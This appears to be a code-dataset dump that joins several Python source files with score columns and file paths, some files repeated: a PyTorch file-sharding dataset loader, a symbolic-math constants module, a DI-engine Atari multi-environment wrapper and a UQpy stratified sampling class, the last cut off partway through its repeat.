rank: int = 0,
world_size: int = 1,
shuffle: bool = False,
repeat: bool = False):
super().__init__()
self.shuffle = shuffle
self.rank = rank
self.world_size = world_size
self.files = hlist_files(data_path.split(','))
self.files = [f for f in self.files if f.find('_SUCCESS') < 0]
self.is_hdfs = data_path.startswith('hdfs')
self.repeat = repeat
print('[DATA]--all dataset containing {} files.'.format(len(self.files)))
if len(self.files) % self.world_size != 0:
print('[DATA]--Whole dataset file num %s cannot split to worldsize %s ' %
(len(self.files), self.world_size))
sys.stdout.flush()
def generate(self):
if self.world_size == 1 or len(self.files) == 1:
cur_dataloader_files = self.files
else:
cur_dataloader_files = split_shard(
self.files, self.rank, self.world_size)
while True:
if self.shuffle:
random.shuffle(cur_dataloader_files)
worker_info = torch.utils.data.get_worker_info()
if worker_info is not None:
if len(cur_dataloader_files) % worker_info.num_workers != 0:
print('[DATA]--current dataloader %s file num %s cannot split to worker_num %s ' %
(self.rank, len(cur_dataloader_files), worker_info.num_workers))
cur_worker_files = split_shard(
cur_dataloader_files, worker_info.id, worker_info.num_workers)
if worker_info.id == 0:
print("[DataLoader] --> Rank:{} Workers:[{} ~ {}][{}] Size of process file:{} ...".format(
self.rank, 0, worker_info.num_workers - 1, worker_info.id, len(cur_dataloader_files)))
else:
cur_worker_files = cur_dataloader_files
if self.shuffle:
random.shuffle(cur_worker_files)
for filepath in cur_worker_files:
if self.is_hdfs:
with hopen(filepath, 'r') as reader:
for line in reader:
yield line.decode()
continue
with open(filepath, 'r') as reader:
for line in reader:
yield line
if not self.repeat:
break
def __iter__(self):
return self.generate()
def split_shard(data: List[Any], shard_idx: int, shard_size: int):
num = len(data)
if num < shard_size:
raise RuntimeError("num:{} < shard size:{}".format(num, shard_size))
start_idx = (num * shard_idx) // shard_size
end_idx = (num * (shard_idx + 1)) // shard_size
return data[start_idx: end_idx] | 0.471953 | 0.21264 |
import math
from abc import abstractmethod
from numbers import (Rational,
Real)
from typing import (Any,
Optional,
Tuple,
Union)
from cfractions import Fraction
from reprit.base import generate_repr
from .expression import Expression
from .hints import SqrtEvaluator
from .utils import (digits_count,
identity,
perfect_sqrt,
positiveness_to_sign,
square)
class Constant(Expression):
@property
def degree(self) -> int:
return 0
@property
@abstractmethod
def value(self) -> Real:
"""Returns value of the constant."""
def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
return self.value
def is_positive(self) -> bool:
return self.value > 0
def lower_bound(self) -> Real:
return self.value
upper_bound = lower_bound
def __eq__(self, other: Any) -> Any:
return (self.value == other
if isinstance(other, Real)
else (isinstance(other, Constant)
and self.value == other.value
if isinstance(other, Expression)
else NotImplemented))
def __hash__(self) -> int:
return hash(self.value)
def __str__(self) -> str:
return str(self.value)
class Finite(Constant):
"""Represents rational number."""
is_finite = True
__slots__ = '_value',
def __init__(self, value: Real = 0) -> None:
self._value = Fraction(value)
@property
def value(self) -> Rational:
return self._value
def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
return self.value
def extract_common_denominator(self) -> Tuple[int, 'Finite']:
return self.value.denominator, Finite(self.value.numerator)
def extract_common_numerator(self) -> Tuple[int, 'Finite']:
return self.value.numerator, One / self.value.denominator
def inverse(self) -> 'Finite':
return Finite(Fraction(self.value.denominator, self.value.numerator))
def is_positive(self) -> bool:
return self.value > 0
def perfect_sqrt(self) -> Expression:
return Finite(Fraction(perfect_sqrt(self.value.numerator),
perfect_sqrt(self.value.denominator)))
def significant_digits_count(self) -> int:
return digits_count(self._value.limit_denominator(1).numerator)
def square(self) -> 'Finite':
return Finite(square(self.value))
def __add__(self, other: Union[Real, 'Finite']) -> 'Finite':
other = to_expression(other)
return ((Finite(self.value + other.value)
if isinstance(other, Finite)
else other.__radd__(self))
if isinstance(other, Expression)
else NotImplemented)
def __bool__(self) -> bool:
return bool(self.value)
def __mul__(self, other: Union[Real, 'Finite']) -> 'Finite':
other = to_expression(other)
return ((Finite(self.value * other.value)
if isinstance(other, Finite)
else other.__rmul__(self))
if isinstance(other, Expression)
else NotImplemented)
def __neg__(self) -> 'Finite':
return Finite(-self.value)
def __radd__(self, other: Union[Real, 'Finite']) -> 'Finite':
return (to_expression(other) + self
if isinstance(other, Real)
else NotImplemented)
__repr__ = generate_repr(__init__)
def __rmul__(self, other: Union[Real, 'Finite']) -> 'Finite':
return (to_expression(other) * self
if isinstance(other, Real)
else NotImplemented)
Zero, One = Finite(0), Finite(1)
class Infinite(Constant):
is_finite = False
@property
def degree(self) -> int:
return 0
@property
def value(self) -> Real:
return positiveness_to_sign(self.is_positive()) * math.inf
__slots__ = '_is_positive',
def __init__(self, is_positive: bool) -> None:
self._is_positive = is_positive
def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
return self.value
def extract_common_denominator(self) -> Tuple[int, 'Expression']:
return 1, self
def extract_common_numerator(self) -> Tuple[int, 'Expression']:
return 1, self
def inverse(self) -> 'Expression':
return Zero
def is_positive(self) -> bool:
return self._is_positive
perfect_sqrt = identity
def significant_digits_count(self) -> int:
return 0
def square(self) -> 'Expression':
return Infinity
def __add__(self, other: Union[Real, 'Expression']) -> Constant:
other = to_expression(other)
return ((self
if (other.is_finite
or (other is not NaN
and self.is_positive() is other.is_positive()))
else NaN)
if isinstance(other, Expression)
else NotImplemented)
def __ge__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and (self.is_positive() or self == other)
if isinstance(other, (Real, Expression))
else NotImplemented)
def __gt__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and self.is_positive() and self != other
if isinstance(other, Expression)
else NotImplemented)
def __le__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and (not self.is_positive() or self == other)
if isinstance(other, Expression)
else NotImplemented)
def __lt__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and not self.is_positive() and self != other
if isinstance(other, Expression)
else NotImplemented)
def __mul__(self, other: Union[Real, 'Expression']) -> Constant:
other = to_expression(other)
return (((Infinity
if self.is_positive() is other.is_positive()
else -Infinity)
if other and other is not NaN
else NaN)
if isinstance(other, Expression)
else NotImplemented)
def __neg__(self) -> 'Expression':
return Infinite(not self.is_positive())
__radd__ = __add__
__repr__ = generate_repr(__init__)
__rmul__ = __mul__
Infinity = Infinite(True)
class _NaN(Constant):
is_finite = False
value = math.nan
_instance = None
def __new__(cls) -> '_NaN':
if cls._instance is None:
cls._instance = super().__new__(cls)
return cls._instance
__slots__ = ()
def extract_common_denominator(self) -> Tuple[int, 'Expression']:
return 1, self
def extract_common_numerator(self) -> Tuple[int, 'Expression']:
return 1, self
def inverse(self) -> 'Expression':
return self
def is_positive(self) -> bool:
return False
perfect_sqrt = identity
def significant_digits_count(self) -> int:
return 0
square = identity
def __add__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
def __ge__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __gt__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __le__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __lt__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __mul__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
__neg__ = identity
def __radd__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
def __repr__(self) -> str:
return 'NaN'
def __rmul__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
NaN = _NaN()
def to_expression(other: Union[Real, Expression]) -> Expression:
return ((Finite(other)
if isinstance(other, Rational)
else (Finite(float(other))
if math.isfinite(other)
else (Infinite(other > 0)
if math.isinf(other)
else NaN)))
if isinstance(other, Real)
else other) | symba/core/constant.py | import math
from abc import abstractmethod
from numbers import (Rational,
Real)
from typing import (Any,
Optional,
Tuple,
Union)
from cfractions import Fraction
from reprit.base import generate_repr
from .expression import Expression
from .hints import SqrtEvaluator
from .utils import (digits_count,
identity,
perfect_sqrt,
positiveness_to_sign,
square)
class Constant(Expression):
@property
def degree(self) -> int:
return 0
@property
@abstractmethod
def value(self) -> Real:
"""Returns value of the constant."""
def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
return self.value
def is_positive(self) -> bool:
return self.value > 0
def lower_bound(self) -> Real:
return self.value
upper_bound = lower_bound
def __eq__(self, other: Any) -> Any:
return (self.value == other
if isinstance(other, Real)
else (isinstance(other, Constant)
and self.value == other.value
if isinstance(other, Expression)
else NotImplemented))
def __hash__(self) -> int:
return hash(self.value)
def __str__(self) -> str:
return str(self.value)
class Finite(Constant):
"""Represents rational number."""
is_finite = True
__slots__ = '_value',
def __init__(self, value: Real = 0) -> None:
self._value = Fraction(value)
@property
def value(self) -> Rational:
return self._value
def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
return self.value
def extract_common_denominator(self) -> Tuple[int, 'Finite']:
return self.value.denominator, Finite(self.value.numerator)
def extract_common_numerator(self) -> Tuple[int, 'Finite']:
return self.value.numerator, One / self.value.denominator
def inverse(self) -> 'Finite':
return Finite(Fraction(self.value.denominator, self.value.numerator))
def is_positive(self) -> bool:
return self.value > 0
def perfect_sqrt(self) -> Expression:
return Finite(Fraction(perfect_sqrt(self.value.numerator),
perfect_sqrt(self.value.denominator)))
def significant_digits_count(self) -> int:
return digits_count(self._value.limit_denominator(1).numerator)
def square(self) -> 'Finite':
return Finite(square(self.value))
def __add__(self, other: Union[Real, 'Finite']) -> 'Finite':
other = to_expression(other)
return ((Finite(self.value + other.value)
if isinstance(other, Finite)
else other.__radd__(self))
if isinstance(other, Expression)
else NotImplemented)
def __bool__(self) -> bool:
return bool(self.value)
def __mul__(self, other: Union[Real, 'Finite']) -> 'Finite':
other = to_expression(other)
return ((Finite(self.value * other.value)
if isinstance(other, Finite)
else other.__rmul__(self))
if isinstance(other, Expression)
else NotImplemented)
def __neg__(self) -> 'Finite':
return Finite(-self.value)
def __radd__(self, other: Union[Real, 'Finite']) -> 'Finite':
return (to_expression(other) + self
if isinstance(other, Real)
else NotImplemented)
__repr__ = generate_repr(__init__)
def __rmul__(self, other: Union[Real, 'Finite']) -> 'Finite':
return (to_expression(other) * self
if isinstance(other, Real)
else NotImplemented)
Zero, One = Finite(0), Finite(1)
class Infinite(Constant):
is_finite = False
@property
def degree(self) -> int:
return 0
@property
def value(self) -> Real:
return positiveness_to_sign(self.is_positive()) * math.inf
__slots__ = '_is_positive',
def __init__(self, is_positive: bool) -> None:
self._is_positive = is_positive
def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
return self.value
def extract_common_denominator(self) -> Tuple[int, 'Expression']:
return 1, self
def extract_common_numerator(self) -> Tuple[int, 'Expression']:
return 1, self
def inverse(self) -> 'Expression':
return Zero
def is_positive(self) -> bool:
return self._is_positive
perfect_sqrt = identity
def significant_digits_count(self) -> int:
return 0
def square(self) -> 'Expression':
return Infinity
def __add__(self, other: Union[Real, 'Expression']) -> Constant:
other = to_expression(other)
return ((self
if (other.is_finite
or (other is not NaN
and self.is_positive() is other.is_positive()))
else NaN)
if isinstance(other, Expression)
else NotImplemented)
def __ge__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and (self.is_positive() or self == other)
if isinstance(other, (Real, Expression))
else NotImplemented)
def __gt__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and self.is_positive() and self != other
if isinstance(other, Expression)
else NotImplemented)
def __le__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and (not self.is_positive() or self == other)
if isinstance(other, Expression)
else NotImplemented)
def __lt__(self, other: Union[Real, 'Expression']) -> bool:
other = to_expression(other)
return (other is not NaN and not self.is_positive() and self != other
if isinstance(other, Expression)
else NotImplemented)
def __mul__(self, other: Union[Real, 'Expression']) -> Constant:
other = to_expression(other)
return (((Infinity
if self.is_positive() is other.is_positive()
else -Infinity)
if other and other is not NaN
else NaN)
if isinstance(other, Expression)
else NotImplemented)
def __neg__(self) -> 'Expression':
return Infinite(not self.is_positive())
__radd__ = __add__
__repr__ = generate_repr(__init__)
__rmul__ = __mul__
Infinity = Infinite(True)
class _NaN(Constant):
is_finite = False
value = math.nan
_instance = None
def __new__(cls) -> '_NaN':
if cls._instance is None:
cls._instance = super().__new__(cls)
return cls._instance
__slots__ = ()
def extract_common_denominator(self) -> Tuple[int, 'Expression']:
return 1, self
def extract_common_numerator(self) -> Tuple[int, 'Expression']:
return 1, self
def inverse(self) -> 'Expression':
return self
def is_positive(self) -> bool:
return False
perfect_sqrt = identity
def significant_digits_count(self) -> int:
return 0
square = identity
def __add__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
def __ge__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __gt__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __le__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __lt__(self, other: Union[Real, 'Expression']) -> bool:
return (False
if isinstance(other, (Real, Expression))
else NotImplemented)
def __mul__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
__neg__ = identity
def __radd__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
def __repr__(self) -> str:
return 'NaN'
def __rmul__(self, other: Union[Real, 'Expression']) -> 'Expression':
return self
NaN = _NaN()
def to_expression(other: Union[Real, Expression]) -> Expression:
return ((Finite(other)
if isinstance(other, Rational)
else (Finite(float(other))
if math.isfinite(other)
else (Infinite(other > 0)
if math.isinf(other)
else NaN)))
if isinstance(other, Real)
else other) | 0.905557 | 0.428771 |
from typing import List
import copy
import numpy as np
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common.env_element import EnvElement, EnvElementInfo
from ding.utils import ENV_REGISTRY
from .atari_env import AtariEnv, ATARIENV_INFO_DICT
@ENV_REGISTRY.register('atari_multi_discrete')
class AtariMultiDiscreteEnv(BaseEnv):
def __init__(self, cfg: dict) -> None:
self._multi_env_num = cfg['multi_env_num']
self._env = [AtariEnv(cfg) for _ in range(self._multi_env_num)]
self._env_done = {i: False for i in range(self._multi_env_num)}
self._done_obs = {i: None for i in range(self._multi_env_num)}
self._final_eval_reward = 0.
self._cfg = cfg
def reset(self) -> np.ndarray:
obs = []
for e in self._env:
obs.append(e.reset())
self._env_done = {i: False for i in range(self._multi_env_num)}
self._done_obs = {i: None for i in range(self._multi_env_num)}
self._final_eval_reward = 0.
return np.concatenate(obs, axis=0)
def close(self) -> None:
for e in self._env:
e.close()
def seed(self, seed: int) -> None:
for i, e in enumerate(self._env):
e.seed(seed + i)
def step(self, action: list) -> BaseEnvTimestep:
timestep = []
for i, (a, e) in enumerate(zip(action, self._env)):
if not self._env_done[i]:
timestep.append(e.step(a))
reward = sum([t.reward for t in timestep])
done = all([t.done for t in timestep])
obs = []
j = 0
for i in range(self._multi_env_num):
if self._env_done[i]:
obs.append(self._done_obs[i])
else:
if timestep[j].done:
# print('done', i, timestep[j].info['final_eval_reward'])
self._final_eval_reward += timestep[j].info['final_eval_reward']
self._env_done[i] = True
self._done_obs[i] = copy.deepcopy(timestep[j].obs)
obs.append(timestep[j].obs)
j += 1
obs = np.concatenate(obs, axis=0)
info = {}
if done:
info['final_eval_reward'] = self._final_eval_reward
return BaseEnvTimestep(obs, reward, done, info)
def info(self) -> BaseEnvInfo:
info = self._env[0].info()
T = EnvElementInfo
if self._cfg.env_id in ATARIENV_INFO_DICT:
obs_shape = list(ATARIENV_INFO_DICT[self._cfg.env_id].obs_space.shape)
n = ATARIENV_INFO_DICT[self._cfg.env_id].act_space.shape[0]
else:
raise NotImplementedError('{} not found in ATARIENV_INFO_DICT [{}]'\
.format(self._cfg.env_id, ATARIENV_INFO_DICT.keys()))
obs_shape[0] = obs_shape[0] * self._multi_env_num
obs_space = T(obs_shape, {'dtype': np.float32}, None, None)
act_shape = tuple([n for _ in range(self._multi_env_num)])
act_space = T(act_shape, {'dtype': np.float32}, None, None)
rew_space = T(1, {'min': -self._multi_env_num, 'max': self._multi_env_num, 'dtype': np.float32}, None, None)
return BaseEnvInfo(
agent_num=self._multi_env_num,
obs_space=obs_space,
act_space=act_space,
rew_space=rew_space,
)
def __repr__(self) -> str:
return "DI-engine Atari Multi Discrete Env({})".format(self._cfg.env_id)
@staticmethod
def create_collector_env_cfg(cfg: dict) -> List[dict]:
collector_env_num = cfg.pop('collector_env_num', 1)
cfg = copy.deepcopy(cfg)
cfg.is_train = True
return [cfg for _ in range(collector_env_num)]
@staticmethod
def create_evaluator_env_cfg(cfg: dict) -> List[dict]:
evaluator_env_num = cfg.pop('evaluator_env_num', 1)
cfg = copy.deepcopy(cfg)
cfg.is_train = False
return [cfg for _ in range(evaluator_env_num)] | dizoo/atari/envs/atari_multi_discrete_env.py | from typing import List
import copy
import numpy as np
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common.env_element import EnvElement, EnvElementInfo
from ding.utils import ENV_REGISTRY
from .atari_env import AtariEnv, ATARIENV_INFO_DICT
@ENV_REGISTRY.register('atari_multi_discrete')
class AtariMultiDiscreteEnv(BaseEnv):
def __init__(self, cfg: dict) -> None:
self._multi_env_num = cfg['multi_env_num']
self._env = [AtariEnv(cfg) for _ in range(self._multi_env_num)]
self._env_done = {i: False for i in range(self._multi_env_num)}
self._done_obs = {i: None for i in range(self._multi_env_num)}
self._final_eval_reward = 0.
self._cfg = cfg
def reset(self) -> np.ndarray:
obs = []
for e in self._env:
obs.append(e.reset())
self._env_done = {i: False for i in range(self._multi_env_num)}
self._done_obs = {i: None for i in range(self._multi_env_num)}
self._final_eval_reward = 0.
return np.concatenate(obs, axis=0)
def close(self) -> None:
for e in self._env:
e.close()
def seed(self, seed: int) -> None:
for i, e in enumerate(self._env):
e.seed(seed + i)
def step(self, action: list) -> BaseEnvTimestep:
timestep = []
for i, (a, e) in enumerate(zip(action, self._env)):
if not self._env_done[i]:
timestep.append(e.step(a))
reward = sum([t.reward for t in timestep])
done = all([t.done for t in timestep])
obs = []
j = 0
for i in range(self._multi_env_num):
if self._env_done[i]:
obs.append(self._done_obs[i])
else:
if timestep[j].done:
# print('done', i, timestep[j].info['final_eval_reward'])
self._final_eval_reward += timestep[j].info['final_eval_reward']
self._env_done[i] = True
self._done_obs[i] = copy.deepcopy(timestep[j].obs)
obs.append(timestep[j].obs)
j += 1
obs = np.concatenate(obs, axis=0)
info = {}
if done:
info['final_eval_reward'] = self._final_eval_reward
return BaseEnvTimestep(obs, reward, done, info)
def info(self) -> BaseEnvInfo:
info = self._env[0].info()
T = EnvElementInfo
if self._cfg.env_id in ATARIENV_INFO_DICT:
obs_shape = list(ATARIENV_INFO_DICT[self._cfg.env_id].obs_space.shape)
n = ATARIENV_INFO_DICT[self._cfg.env_id].act_space.shape[0]
else:
raise NotImplementedError('{} not found in ATARIENV_INFO_DICT [{}]'\
.format(self._cfg.env_id, ATARIENV_INFO_DICT.keys()))
obs_shape[0] = obs_shape[0] * self._multi_env_num
obs_space = T(obs_shape, {'dtype': np.float32}, None, None)
act_shape = tuple([n for _ in range(self._multi_env_num)])
act_space = T(act_shape, {'dtype': np.float32}, None, None)
rew_space = T(1, {'min': -self._multi_env_num, 'max': self._multi_env_num, 'dtype': np.float32}, None, None)
return BaseEnvInfo(
agent_num=self._multi_env_num,
obs_space=obs_space,
act_space=act_space,
rew_space=rew_space,
)
def __repr__(self) -> str:
return "DI-engine Atari Multi Discrete Env({})".format(self._cfg.env_id)
@staticmethod
def create_collector_env_cfg(cfg: dict) -> List[dict]:
collector_env_num = cfg.pop('collector_env_num', 1)
cfg = copy.deepcopy(cfg)
cfg.is_train = True
return [cfg for _ in range(collector_env_num)]
@staticmethod
def create_evaluator_env_cfg(cfg: dict) -> List[dict]:
evaluator_env_num = cfg.pop('evaluator_env_num', 1)
cfg = copy.deepcopy(cfg)
cfg.is_train = False
return [cfg for _ in range(evaluator_env_num)] | 0.457379 | 0.171477 |
import logging
from beartype import beartype
from numpy.random import RandomState
from UQpy.sampling.stratified_sampling.baseclass.StratifiedSampling import StratifiedSampling
from UQpy.distributions import DistributionContinuous1D, JointIndependent
from UQpy.sampling.stratified_sampling.strata import RectangularStrata
from UQpy.sampling.stratified_sampling.strata.baseclass.Strata import Strata
from UQpy.utilities.ValidationTypes import *
class TrueStratifiedSampling(StratifiedSampling):
@beartype
def __init__(
self,
distributions: Union[DistributionContinuous1D, JointIndependent, list[DistributionContinuous1D]],
strata_object: Strata,
nsamples_per_stratum: Union[int, list[int]] = None,
nsamples: int = None,
random_state: RandomStateType = None,
):
"""
Class for Stratified Sampling (:cite:`StratifiedSampling1`).
:param distributions: List of :class:`.Distribution` objects corresponding to each random variable.
:param strata_object: Defines the stratification of the unit hypercube. This must be provided and must be an
object of a :class:`.Strata` child class: :class:`.Rectangular`, :class:`.Voronoi`, or :class:`.Delaunay`.
:param nsamples_per_stratum: Specifies the number of samples in each stratum. This must be either an
integer, in which case an equal number of samples are drawn from each stratum, or a list. If it is provided as
a list, the length of the list must be equal to the number of strata.
If `nsamples_per_stratum` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
:param nsamples: Specify the total number of samples. If `nsamples` is specified, the samples will
be drawn in proportion to the volume of the strata. Thus, each stratum will contain
:code:`round(V_i* nsamples)` samples.
If `nsamples` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
:param random_state: Random seed used to initialize the pseudo-random number generator. Default is :any:`None`.
If an :any:`int` is provided, this sets the seed for an object of :class:`numpy.random.RandomState`. Otherwise,
the object itself can be passed directly.
"""
self.logger = logging.getLogger(__name__)
self.weights: NumpyFloatArray = None
"""Individual sample weights."""
self.strata_object = strata_object
self.nsamples_per_stratum = nsamples_per_stratum
self.nsamples = nsamples
self.samples:NumpyFloatArray = None
"""The generated samples following the prescribed distribution."""
self.samplesU01:NumpyFloatArray = None
"""The generated samples on the unit hypercube."""
self.distributions = distributions
self.random_state = random_state
if isinstance(self.random_state, int):
self.random_state = RandomState(self.random_state)
elif not isinstance(self.random_state, (type(None), RandomState)):
raise TypeError('UQpy: random_state must be None, an int or an np.random.RandomState object.')
if self.random_state is None:
self.random_state = self.strata_object.random_state
if isinstance(self.strata_object, RectangularStrata):
self.strata_object.check_centered(nsamples)
self.logger.info("UQpy: Stratified_sampling object is created")
if self.nsamples_per_stratum is not None or self.nsamples is not None:
self.run(nsamples_per_stratum=self.nsamples_per_stratum,
nsamples=self.nsamples)
def transform_samples(self, samples01):
"""
Transform samples in the unit hypercube :math:`[0, 1]^n` to the prescribed distribution using the inverse CDF.
:param samples01: :class:`numpy.ndarray` containing the generated samples on :math:`[0, 1]^n`.
:return: :class:`numpy.ndarray` containing the generated samples following the prescribed distribution.
"""
samples_u_to_x = np.zeros_like(samples01)
for j in range(samples01.shape[1]):
samples_u_to_x[:, j] = self.distributions[j].icdf(samples01[:, j])
self.samples = samples_u_to_x
@beartype
def run(
self,
nsamples_per_stratum: Union[None, int, list[int]] = None,
nsamples: Union[None, PositiveInteger] = None,
):
"""
Executes stratified sampling.
This method performs the sampling for each of the child classes by running two methods:
:meth:`create_samplesu01`, and :meth:`transform_samples`. The :meth:`create_samplesu01` method is
unique to each child class and therefore must be overwritten when a new child class is defined. The
:meth:`transform_samples` method is common to all stratified sampling classes and is therefore defined by the
parent class. It does not need to be modified.
If `nsamples` or `nsamples_per_stratum` is provided when the class is defined, the :meth:`run`
method will be executed automatically. If neither `nsamples_per_stratum` or `nsamples` are provided
when the class is defined, the user must call the :meth:`run` method to perform stratified sampling.
:param nsamples_per_stratum: Specifies the number of samples in each stratum. This must be either an
integer, in which case an equal number of samples are drawn from each stratum, or a list. If it is provided as
a list, the length of the list must be equal to the number of strata.
If `nsamples_per_stratum` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
:param nsamples: Specify the total number of samples. If `nsamples` is specified, the samples will
be drawn in proportion to the volume of the strata. Thus, each stratum will contain
:code:`round(V_i*nsamples)` samples where :math:`V_i \le 1` is the volume of stratum `i` in the unit
hypercube.
If `nsamples` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
"""
self.nsamples_per_stratum = nsamples_per_stratum
self.nsamples = nsamples
self._run_checks()
self.logger.info("UQpy: Performing Stratified Sampling")
self.create_unit_hypercube_samples()
self.transform_samples(self.samplesU01)
self.logger.info("UQpy: Stratified Sampling is completed")
def _run_checks(self):
if self.nsamples is not None:
self.nsamples_per_stratum = (self.strata_object.volume * self.nsamples).round()
if self.nsamples_per_stratum is not None:
if isinstance(self.nsamples_per_stratum, int):
self.nsamples_per_stratum = [self.nsamples_per_stratum] * \
self.strata_object.volume.shape[0]
elif isinstance(self.nsamples_per_stratum, list):
if len(self.nsamples_per_stratum) != self.strata_object.volume.shape[0]:
raise ValueError("UQpy: Length of 'nsamples_per_stratum' must match the number of strata.")
elif self.nsamples is None:
raise ValueError("UQpy: 'nsamples_per_stratum' must be an integer or a list.")
else:
self.nsamples_per_stratum = [1] * self.strata_object.volume.shape[0]
def create_unit_hypercube_samples(self):
samples_in_strata, weights = self.strata_object.sample_strata(
self.nsamples_per_stratum, self.random_state)
self.weights = np.array(weights)
self.samplesU01 = np.concatenate(samples_in_strata, axis=0) | src/UQpy/sampling/stratified_sampling/TrueStratifiedSampling.py | import logging
from beartype import beartype
from numpy.random import RandomState
from UQpy.sampling.stratified_sampling.baseclass.StratifiedSampling import StratifiedSampling
from UQpy.distributions import DistributionContinuous1D, JointIndependent
from UQpy.sampling.stratified_sampling.strata import RectangularStrata
from UQpy.sampling.stratified_sampling.strata.baseclass.Strata import Strata
from UQpy.utilities.ValidationTypes import *
class TrueStratifiedSampling(StratifiedSampling):
@beartype
def __init__(
self,
distributions: Union[DistributionContinuous1D, JointIndependent, list[DistributionContinuous1D]],
strata_object: Strata,
nsamples_per_stratum: Union[int, list[int]] = None,
nsamples: int = None,
random_state: RandomStateType = None,
):
"""
Class for Stratified Sampling (:cite:`StratifiedSampling1`).
:param distributions: List of :class:`.Distribution` objects corresponding to each random variable.
:param strata_object: Defines the stratification of the unit hypercube. This must be provided and must be an
object of a :class:`.Strata` child class: :class:`.Rectangular`, :class:`.Voronoi`, or :class:`.Delaunay`.
:param nsamples_per_stratum: Specifies the number of samples in each stratum. This must be either an
integer, in which case an equal number of samples are drawn from each stratum, or a list. If it is provided as
a list, the length of the list must be equal to the number of strata.
If `nsamples_per_stratum` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
:param nsamples: Specify the total number of samples. If `nsamples` is specified, the samples will
be drawn in proportion to the volume of the strata. Thus, each stratum will contain
:code:`round(V_i* nsamples)` samples.
If `nsamples` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
:param random_state: Random seed used to initialize the pseudo-random number generator. Default is :any:`None`.
If an :any:`int` is provided, this sets the seed for an object of :class:`numpy.random.RandomState`. Otherwise,
the object itself can be passed directly.
"""
self.logger = logging.getLogger(__name__)
self.weights: NumpyFloatArray = None
"""Individual sample weights."""
self.strata_object = strata_object
self.nsamples_per_stratum = nsamples_per_stratum
self.nsamples = nsamples
self.samples:NumpyFloatArray = None
"""The generated samples following the prescribed distribution."""
self.samplesU01:NumpyFloatArray = None
"""The generated samples on the unit hypercube."""
self.distributions = distributions
self.random_state = random_state
if isinstance(self.random_state, int):
self.random_state = RandomState(self.random_state)
elif not isinstance(self.random_state, (type(None), RandomState)):
raise TypeError('UQpy: random_state must be None, an int or an np.random.RandomState object.')
if self.random_state is None:
self.random_state = self.strata_object.random_state
if isinstance(self.strata_object, RectangularStrata):
self.strata_object.check_centered(nsamples)
self.logger.info("UQpy: Stratified_sampling object is created")
if self.nsamples_per_stratum is not None or self.nsamples is not None:
self.run(nsamples_per_stratum=self.nsamples_per_stratum,
nsamples=self.nsamples)
def transform_samples(self, samples01):
"""
Transform samples in the unit hypercube :math:`[0, 1]^n` to the prescribed distribution using the inverse CDF.
:param samples01: :class:`numpy.ndarray` containing the generated samples on :math:`[0, 1]^n`.
:return: :class:`numpy.ndarray` containing the generated samples following the prescribed distribution.
"""
samples_u_to_x = np.zeros_like(samples01)
for j in range(samples01.shape[1]):
samples_u_to_x[:, j] = self.distributions[j].icdf(samples01[:, j])
self.samples = samples_u_to_x
@beartype
def run(
self,
nsamples_per_stratum: Union[None, int, list[int]] = None,
nsamples: Union[None, PositiveInteger] = None,
):
"""
Executes stratified sampling.
This method performs the sampling for each of the child classes by running two methods:
:meth:`create_samplesu01`, and :meth:`transform_samples`. The :meth:`create_samplesu01` method is
unique to each child class and therefore must be overwritten when a new child class is defined. The
:meth:`transform_samples` method is common to all stratified sampling classes and is therefore defined by the
parent class. It does not need to be modified.
If `nsamples` or `nsamples_per_stratum` is provided when the class is defined, the :meth:`run`
